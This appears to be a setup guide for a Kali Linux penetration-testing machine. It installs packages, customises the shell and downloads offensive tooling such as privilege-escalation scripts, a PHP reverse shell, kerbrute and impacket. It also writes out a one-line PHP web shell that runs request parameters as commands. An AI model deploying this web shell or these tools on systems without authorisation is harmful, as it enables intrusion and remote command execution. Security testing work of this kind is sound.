Skip to content

Kali

Init

sudo apt update -y
sudo apt install -y kali-linux-default
sudo apt install -y jq
sudo apt install -y lftp
sudo apt install -y whatweb
sudo apt install -y gobuster
sudo apt install -y feroxbuster
sudo apt install -y smtp-user-enum
sudo apt install -y html2text
sudo apt install -y exploitdb
sudo apt install -y fonts-hack-ttf
pip3 install pip --upgrade
pip3 install setuptools --upgrade

Tmux

cd ~
git clone https://github.com/gpakosz/.tmux.git
ln -s -f .tmux/.tmux.conf

echo "" > ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_main='\uE0B0'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_sub='\uE0B1'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_main='\uE0B2'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_sub='\uE0B3'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_left=' 💀 #S '"  >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_right=\" #{prefix}#{mouse}#{pairing}#{synchronized} #(if $(/sbin/ifconfig tun0 > /dev/null 2>/dev/null); then /sbin/ifconfig tun0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; else /sbin/ifconfig eth0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; fi) , %R , %d %b | #{username}#{root} | #{hostname} | #{IP} \""   >> ~/.tmux.conf.local


echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc

/usr/share/wordlists

Payloads

sudo apt install -y wordlists
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

sudo apt install -y seclists
sudo ln -s /usr/share/seclists /usr/share/wordlists/seclists

# sudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O /usr/share/wordlists/seclists.zip && sudo unzip /usr/share/wordlists/seclists.zip && sudo rm -f /usr/share/wordlists/seclists.zip && sudo mv /usr/share/wordlists/SecLists-master /usr/share/wordlists/seclists

sudo git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git /usr/share/wordlists/payloadsAllTheThings

#sudo git clone https://github.com/soffensive/windowsblindread.git /usr/share/wordlists/windowsblindread

/opt/linux

sudo chown kali:kali /opt
mkdir -p /opt/linux

echo "==========> Linux:LinPeas"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /opt/linux/linux-peas.sh
chmod +x /opt/linux/linux-peas.sh

echo "==========> Linux:LinEnum"
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /opt/linux/linux-enum.sh 
chmod +x /opt/linux/linux-enum.sh

echo "==========> Linux:LES (Linux Exploit Suggester)"
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /opt/linux/linux-exploit-suggester.sh
chmod +x /opt/linux/linux-exploit-suggester.sh

echo "==========> Linux:Linux Smart Enumeration"
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O /opt/linux/linux-smart-enum.sh
chmod +x /opt/linux/linux-smart-enum.sh

echo "==========> Linux:Linux Priv Checker"
wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.sh -O /opt/linux/linux-priv-checker.sh
chmod +x /opt/linux/linux-priv-checker.sh

/opt/php

sudo chown kali:kali /opt
mkdir -p /opt/php

echo "==========> PHP:shell.php"
echo '<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>' > /opt/php/shell.php

echo "==========> PHP:r-shell.php"
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz -O /opt/php/php-reverse-shell-1.0.tar.gz
tar -xf /opt/php/php-reverse-shell-1.0.tar.gz
rm /opt/php/php-reverse-shell-1.0.tar.gz

/opt/windows

sudo chown kali:kali /opt
mkdir -p /opt/windows
mkdir -p /opt/windows/sys

echo "==========> Windows:SysinternalsSuite"
wget https://download.sysinternals.com/files/SysinternalsSuite.zip -O /opt/windows/SysinternalsSuite.zip
unzip SysinternalsSuite.zip -d /opt/windows/sys
rm /opt/windows/SysinternalsSuite.zip

#echo "==========> Windows:accesschk.exe"
#wget https://live.sysinternals.com/accesschk.exe -O /opt/windows/accesschk.exe

echo "==========> Windows:powercat.ps1"
git clone https://github.com/besimorhino/powercat.git /opt/windows/powercat

echo "==========> Windows:Sherlock.ps1 => (too run type: Find-AllVulns)"
wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O /opt/windows/Sherlock.ps1

echo "==========> Windows:WinPeas.bat"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -O /opt/windows/winPEAS.bat

echo "==========> Windows:winPEASx86.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx86.exe -O /opt/windows/winPEASx86.exe

echo "==========> Windows:winPEASx64.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -O /opt/windows/winPEASx64.exe

echo "==========> Windows:exploit-suggester"
pip3 install wesng
ln -s /home/kali/.local/bin/wes /opt/windows/windows-exploit-suggester

echo "==========> Windows:kerbrute"
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O /opt/windows/kerbrute
chmod +x /opt/windows/kerbrute
sudo rm /usr/bin/kerbrute 2>/dev/null

echo "==========> Windows:kerberoast"
git clone https://github.com/nidem/kerberoast.git /opt/windows/kerberoast

echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
rm /opt/windows/bloodHoundPy.zip

/opt/tools

sudo chown kali:kali /opt
mkdir -p /opt/tools

echo "==========> Tools:impacket"
git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
sudo pip3 install -r /opt/tools/impacket/requirements.txt
cd /opt/tools/impacket/ 
sudo pip3 install .
sudo python3 setup.py install

echo "==========> Tools:finger"
wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz -O /opt/tools/finger-user-enum-1.0.tar.gz
tar -xf /opt/tools/finger-user-enum-1.0.tar.gz
rm /opt/tools/finger-user-enum-1.0.tar.gz

echo "==========> Tools:cms:drupwn"
wget https://github.com/immunIT/drupwn/archive/refs/tags/1.0.4.tar.gz -O /opt/tools/drupwn.tar.gz
tar -xf /opt/tools/drupwn.tar.gz
rm /opt/tools/drupwn.tar.gz
cd /opt/tools/drupwn-1.0.4
sudo python3 setup.py install

echo "==========> Tools:cms:droopescan"
git clone https://github.com/droope/droopescan.git /opt/tools/droopescan
cd /opt/tools/droopescan
pip3 install -r requirements.txt

Firefox extension

  • HackTools
  • FoxyProxy
  • Fire Source Viewer
  • Wappalyzer

Waterfox configuration

~/.local/share/applications/waterfox.desktop

#!/usr/bin/env xdg-open
[Desktop Entry]
Version=1.0
Type=Application
Name=Waterfox
Exec=/opt/waterfox/waterfox
Icon=/opt/waterfox/browser/chrome/icons/default/default48.png

  • Pentest Monkey: http://pentestmonkey.net
  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker
  • Sysinternals Suite https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite